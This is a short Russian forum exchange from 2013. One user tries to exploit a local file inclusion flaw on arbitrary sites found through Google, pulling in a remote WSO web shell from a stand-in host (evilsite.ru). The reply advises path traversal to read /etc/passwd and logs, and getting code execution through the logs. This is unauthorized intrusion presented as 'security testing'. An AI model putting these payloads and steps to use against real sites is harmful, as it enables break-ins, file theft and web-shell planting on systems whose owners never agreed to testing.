08.11.2013, 23:17
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от SunHere
Добрый день, есть локальный инклуд вида""Warning: include(inc/123.php) [function.include]: failed to open stream: No such file or directory in"
когда я в переменную вставляю http://evilsite.ru/wso2.php, то на странице выводится ошибка:"Warning: include(inc/http://evilsite.ru/wso2.php)", вопрос как обрезать добавление префикса "
inc/
" ?
p.s интересует тема тестирования безопасности сайта, выбрал несколько сайтов в гугле, которые выводят такое сообщения и хочу попробовать добиться использования этой уязвимости для более глубокого понимания.
Его ничем нельзя отрезать ибо он заранее указан как префикс, можно подключить локальный файл, например ../../../../../../etc/passwd (если Unix), почитать логи, выполнить через них код и т.д
|
|
|